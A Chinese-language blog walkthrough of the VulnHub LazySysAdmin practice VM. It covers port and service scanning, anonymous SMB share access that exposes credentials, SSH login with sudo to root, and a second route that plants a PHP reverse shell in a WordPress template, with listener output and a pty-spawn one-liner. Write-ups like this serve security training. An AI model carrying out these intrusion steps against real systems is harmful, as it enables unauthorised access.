VulnHub – LazySysAdmin

VulnHub – LazySysAdmin: 1

环境下载

Lazysysadmin.zip (Size: 479 MB)
Download: https://drive.google.com/uc?id=0B_A-fCfoBmkLOXN5Y1ZmZnpDQTQ&export=download
Download (Mirror): https://download.vulnhub.com/lazysysadmin/Lazysysadmin.zip
Download (Torrent): https://download.vulnhub.com/lazysysadmin/Lazysysadmin.zip.torrent ( Magnet)

运行环境

  • Virtualbox (二选一)
  • Vnware Workstation player

通关提示

  • Enumeration is key
  • Try Harder
  • Look in front of you
  • Tweet @togiemcdogie if you need more hints

ip探测

由于我们的目标与我们的物理机位于同一网段,所以我们要做的就是先获取目标机器的地址。在内网主机探测中,可以使用netdiscover来进行。

netdiscover -i wlo1

1
2
3
4
5
6
7
8
9
➜  evilk0 netdiscover -i wlo1

Currently scanning: 192.168.21.0/16 | Screen View: Unique Hosts

1 Captured ARP Req/Rep packets, from 1 hosts. Total size: 42
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.0.100 08:00:27:da:8a:ac 1 42 PCS Systemtechnik GmbH

端口扫描

我们需要知道目标机器上运行了哪些服务,利用某些服务的漏洞或配置不当来进行攻击,所以我们先进行端口扫描。

使用masscan扫描

masscan 192.168.0.100 -p 1-10000 –rate=1000

1
2
3
4
5
6
7
8
9
10
11
12
➜  evilk0 masscan 192.168.0.100 -p 1-10000 --rate=1000

Starting masscan 1.0.3 (http://bit.ly/14GZzcT) at 2018-01-31 12:53:27 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [10000 ports/host]
Discovered open port 3306/tcp on 192.168.0.100
Discovered open port 6667/tcp on 192.168.0.100
Discovered open port 22/tcp on 192.168.0.100
Discovered open port 139/tcp on 192.168.0.100
Discovered open port 80/tcp on 192.168.0.100
Discovered open port 445/tcp on 192.168.0.100

使用nmap扫描

nmap -T4 -A -v 192.168.0.100 -p 0-10000

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
➜  evilk0 nmap -T4 -A -v 192.168.0.31 -p0-10000        

Starting Nmap 7.50 ( https://nmap.org ) at 2018-01-31 20:55 CST
.................................
Scanning LazySysAdmin.lan (192.168.0.100) [10001 ports]
Discovered open port 80/tcp on 192.168.0.100
Discovered open port 22/tcp on 192.168.0.100
Discovered open port 139/tcp on 192.168.0.100
Discovered open port 445/tcp on 192.168.0.100
Discovered open port 3306/tcp on 192.168.0.100
Discovered open port 6667/tcp on 192.168.0.100
.................................
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA)
| 2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA)
| 256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA)
|_ 256 1f:65:c0:dd:15:e6:e4:21:f2:c1:9b:a3:b6:55:a0:45 (EdDSA)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Silex v2.2.7
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 4 disallowed entries
|_/old/ /test/ /TR2/ /Backnode_files/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Backnode
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3306/tcp open mysql MySQL (unauthorized)
6667/tcp open irc InspIRCd
| irc-info:
| server: Admin.local
| users: 1.0
| servers: 1
| chans: 0
| lusers: 1
| lservers: 0
| source ident: nmap
| source host: 192.168.2.107
|_ error: Closing link: (nmap@192.168.2.107) [Client exited]
MAC Address: 08:00:27:DA:8A:AC (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Uptime guess: 0.008 days (since Wed Jan 31 20:44:16 2018)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| LAZYSYSADMIN<00> Flags: <unique><active>
| LAZYSYSADMIN<03> Flags: <unique><active>
| LAZYSYSADMIN<20> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
|_ WORKGROUP<1e> Flags: <group><active>
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: lazysysadmin
| NetBIOS computer name: LAZYSYSADMIN\x00
| Domain name: \x00
| FQDN: lazysysadmin
|_ System time: 2018-01-31T22:55:23+10:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol

TRACEROUTE
HOP RTT ADDRESS
1 0.50 ms LazySysAdmin.lan (192.168.0.100)

NSE: Script Post-scanning.
Initiating NSE at 20:55
Completed NSE at 20:55, 0.00s elapsed
Initiating NSE at 20:55
Completed NSE at 20:55, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.19 seconds
Raw packets sent: 11045 (487.680KB) | Rcvd: 11034 (442.816KB)

对比可发现masscan扫描端口的速度比nmap快很多,但是想要知道端口所运行服务的具体信息,就要用到nmap了。根据扫描结果可知目标机开启了22、80、139、445、3306、6667这几个端口。

我们先从web入手。我们先使用dirb来爆破目标存在的目录(dirb安装方法附在文章最后)

1
2
➜  evilk0 ./dirb http://192.168.0.100 wordlists/common.txt -o /home/evilk0/Desktop/result.txt
用法:./dirb 目标url 用于爆破的目录 -o 输出文件

在工具扫描的同时,我们手工探测漏洞利用点。访问目标web服务,未发现什么,查看是否存在robots.txt发现4个目录,并且存在目录遍历漏洞,但是并没用获取到可以利用的信息。

http://192.168.0.100/robots.txt

1
2
3
4
5
User-agent: *
Disallow: /old/
Disallow: /test/
Disallow: /TR2/
Disallow: /Backnode_files/

1

使用curl获取目标web的banner信息,发现使用的中间件是apache2.4.7,目标系统为Ubuntu。

1
2
3
4
5
6
7
8
9
10
11
➜  evilk0 curl -I 192.168.0.100

HTTP/1.1 200 OK
Date: Wed, 31 Jan 2018 13:01:20 GMT
Server: Apache/2.4.7 (Ubuntu)
Last-Modified: Sun, 06 Aug 2017 05:02:15 GMT
ETag: "8ce8-5560ea23d23c0"
Accept-Ranges: bytes
Content-Length: 36072
Vary: Accept-Encoding
Content-Type: text/html

我们再来看看dirb扫描结果,发现目标文章用的是wordpress,且还有phpmyadmin

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
➜  dirb222 cat /home/evilk0/Desktop/result.txt | grep "^+"

+ http://192.168.0.100/index.html (CODE:200|SIZE:36072)
+ http://192.168.0.100/info.php (CODE:200|SIZE:77257)
+ http://192.168.0.100/robots.txt (CODE:200|SIZE:92)
+ http://192.168.0.100/server-status (CODE:403|SIZE:293)
+ http://192.168.0.100/phpmyadmin/favicon.ico (CODE:200|SIZE:18902)
+ http://192.168.0.100/phpmyadmin/index.php (CODE:200|SIZE:8262)
+ http://192.168.0.100/phpmyadmin/libraries (CODE:403|SIZE:300)
+ http://192.168.0.100/phpmyadmin/phpinfo.php (CODE:200|SIZE:8264)
+ http://192.168.0.100/phpmyadmin/setup (CODE:401|SIZE:459)
+ http://192.168.0.100/wordpress/index.php (CODE:301|SIZE:0)
+ http://192.168.0.100/wordpress/xmlrpc.php (CODE:405|SIZE:42)
+ http://192.168.0.100/javascript/jquery/jquery (CODE:200|SIZE:252879)
+ http://192.168.0.100/javascript/jquery/version (CODE:200|SIZE:5)
+ http://192.168.0.100/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)
+ http://192.168.0.100/wordpress/wp-admin/index.php (CODE:302|SIZE:0)
+ http://192.168.0.100/wordpress/wp-content/index.php (CODE:200|SIZE:0)
+ http://192.168.0.100/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://192.168.0.100/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)
+ http://192.168.0.100/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://192.168.0.100/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)
+ http://192.168.0.100/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)
+ http://192.168.0.100/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)

wpscan扫描结果

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
root@kali:~# wpscan http://192.168.0.100/wordpress
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 2.9.3
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: http://192.168.0.100/wordpress/
[+] Started: Thu Feb 1 01:37:20 2018

[!] The WordPress 'http://192.168.0.100/wordpress/readme.html' file exists exposing a version number
[+] Interesting header: LINK: <http://192.168.0.100/wordpress/index.php?rest_route=/>; rel="https://api.w.org/"
[+] Interesting header: SERVER: Apache/2.4.7 (Ubuntu)
[+] Interesting header: X-POWERED-BY: PHP/5.5.9-1ubuntu4.22
[!] Registration is enabled: http://192.168.0.100/wordpress/wp-login.php?action=register
[+] XML-RPC Interface available under: http://192.168.0.100/wordpress/xmlrpc.php
[!] Upload directory has directory listing enabled: http://192.168.0.100/wordpress/wp-content/uploads/
[!] Includes directory has directory listing enabled: http://192.168.0.100/wordpress/wp-includes/

[+] WordPress version 4.8.5 (Released on 2018-01-16) identified from meta generator, links opml

[+] WordPress theme in use: twentyfifteen - v1.8

[+] Name: twentyfifteen - v1.8
| Last updated: 2017-11-16T00:00:00.000Z
| Location: http://192.168.0.100/wordpress/wp-content/themes/twentyfifteen/
| Readme: http://192.168.0.100/wordpress/wp-content/themes/twentyfifteen/readme.txt
[!] The version is out of date, the latest version is 1.9
| Style URL: http://192.168.0.100/wordpress/wp-content/themes/twentyfifteen/style.css
| Theme Name: Twenty Fifteen
| Theme URI: https://wordpress.org/themes/twentyfifteen/
| Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple,...
| Author: the WordPress team
| Author URI: https://wordpress.org/

[+] Enumerating plugins from passive detection ...
[+] No plugins found

[+] Finished: Thu Feb 1 01:37:24 2018
[+] Requests Done: 356
[+] Memory used: 37.98 MB
[+] Elapsed time: 00:00:04

6

enum4linux 192.168.0.100

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Feb  1 00:46:08 2018

==========================
| Target Information |
==========================
Target ........... 192.168.0.100
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


=====================================================
| Enumerating Workgroup/Domain on 192.168.0.100 |
=====================================================
[+] Got domain/workgroup name: WORKGROUP

=============================================
| Nbtstat Information for 192.168.0.100 |
=============================================
Looking up status of 192.168.0.100
LAZYSYSADMIN <00> - B <ACTIVE> Workstation Service
LAZYSYSADMIN <03> - B <ACTIVE> Messenger Service
LAZYSYSADMIN <20> - B <ACTIVE> File Server Service
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections

MAC Address = 00-00-00-00-00-00

======================================
| Session Check on 192.168.0.100 |
======================================
[+] Server 192.168.0.100 allows sessions using username '', password ''

============================================
| Getting domain SID for 192.168.0.100 |
============================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

=======================================
| OS information on 192.168.0.100 |
=======================================
[+] Got OS info for 192.168.0.100 from smbclient:
[+] Got OS info for 192.168.0.100 from srvinfo:
LAZYSYSADMIN Wk Sv PrQ Unx NT SNT Web server
platform_id : 500
os version : 6.1
server type : 0x809a03

==============================
| Users on 192.168.0.100 |
==============================


==========================================
| Share Enumeration on 192.168.0.100 |
==========================================
WARNING: The "syslog" option is deprecated

Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
share$ Disk Sumshare
IPC$ IPC IPC Service (Web server)
Reconnecting with SMB1 for workgroup listing.

Server Comment
--------- -------

Workgroup Master
--------- -------
WORKGROUP

[+] Attempting to map shares on 192.168.0.100
//192.168.0.100/print$ Mapping: DENIED, Listing: N/A
//192.168.0.100/share$ Mapping: OK, Listing: OK
//192.168.0.100/IPC$ [E] Can't understand response:
WARNING: The "syslog" option is deprecated
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

=====================================================
| Password Policy Information for 192.168.0.100 |
=====================================================


[+] Attaching to 192.168.0.100 using a NULL share

[+] Trying protocol 445/SMB...

[+] Found domain(s):

[+] LAZYSYSADMIN
[+] Builtin

[+] Password Info for Domain: LAZYSYSADMIN

[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: Not Set
[+] Password Complexity Flags: 000000

[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0

[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set


[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 5


===============================
| Groups on 192.168.0.100 |
===============================

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

========================================================================
| Users on 192.168.0.100 via RID cycling (RIDS: 500-550,1000-1050) |
========================================================================
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-2952042175-1524911573-1237092750
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-500 *unknown*\*unknown* (8)

S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
S-1-5-32-1000 *unknown*\*unknown* (8)
S-1-5-32-1001 *unknown*\*unknown* (8)

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\togie (Local User)
[+] Enumerating users using SID S-1-5-21-2952042175-1524911573-1237092750 and logon username '', password ''
S-1-5-21-2952042175-1524911573-1237092750-500 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-501 LAZYSYSADMIN\nobody (Local User)

S-1-5-21-2952042175-1524911573-1237092750-512 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-513 LAZYSYSADMIN\None (Domain Group)
S-1-5-21-2952042175-1524911573-1237092750-514 *unknown*\*unknown* (8)


==============================================
| Getting printer info for 192.168.0.100 |
==============================================
No printers returned.


enum4linux complete on Thu Feb 1 00:46:33 2018

windows下获取共享资源

1
net use k: \\192.168.0.100\share$

linux下获取共享资源

1
mount -t cifs -o username='',password='' //192.168.0.100/share$ /mnt

2

发现两个关键的文件deets.txt和wp-config.php

3

4

所以我们尝试用上面获取的mysql账号密码去登录phpmyadmin,但是发现没一个表项可以查看。

5

不过不要紧,上面还有一个密码是12345,而且之前我们登录WordPress页面的时候,页面显示My name is togie.,所以我们可以用账号:togie 密码:12345尝试登录ssh,发现可以成功登录。

1
2
3
4
5
6
7
8
togie@LazySysAdmin:~$ whoami
togie
togie@LazySysAdmin:~$ id
uid=1000(togie) gid=1000(togie) groups=1000(togie),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare)
togie@LazySysAdmin:~$ sudo su
[sudo] password for togie:
root@LazySysAdmin:/home/togie# id
uid=0(root) gid=0(root) groups=0(root)

有了root权限,我们就有权限查看目标文件/root/proof.txt,这样就算完成了整个游戏了。这里刚好togie有root权限,所以我直接用sudo su切换到root权限,但是如果togie没有root权限,那么我们就需要通过其他方式来提权了。

思路二

通过账号:Admin 密码:TogieMYSQL12345^^登录WordPress控制面板,向404.php页面模板插入PHP反弹shell的代码。

7

编辑好后,点击下面的upload file应用,然后访问http://192.168.0.100/wordpress/?p=2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
root@kali:~# nc -vlp 1234
listening on [any] 1234 ...
192.168.0.100: inverse host lookup failed: Unknown host
connect to [192.168.0.109] from (UNKNOWN) [192.168.0.100] 36468
Linux LazySysAdmin 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 i686 i686 GNU/Linux
16:03:42 up 6 min, 0 users, load average: 0.01, 0.15, 0.11
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ sudo su
sudo: no tty present and no askpass program specified

出现no tty present and no askpass program specified,刚好目标机有python环境,所以我们导入Python的pty模块。

1
python -c 'import pty; pty.spawn("/bin/sh")'

但是我们不知道www-data的密码,所以接下来就要进行提权,先来看一下目标机的详细信息

1
2
3
4
5
6
7
8
$ uname -r
4.4.0-31-generic
$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 14.04.5 LTS
Release: 14.04
Codename: trusty

所以用CVE-2017-1000112提权即可,但是目标机上没有gcc,这时候,我们可以本地搭建和目标机一样的环境,在本地编译好提权exp后,在目标机器上运行即可。

dirb安装方法(kali已自带)

1
2
3
4
5
6
wget https://svwh.dl.sourceforge.net/project/dirb/dirb/2.22/dirb222.tar.gz
tar zxvf dirb222.tar.gz
cd dirb222/
apt-get install libcurl4-gnutls-dev
./configure && make
./dirb #运行即可

参考链接:

VulnHub Walk-through – LazySysAdmin: 1

LazySysAdmin Vulnerable Machine Walk-through

文章作者: Mochazz
文章链接: https://mochazz.github.io/2018/02/02/vulnhub-LazySysAdmin/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Mochazz's blog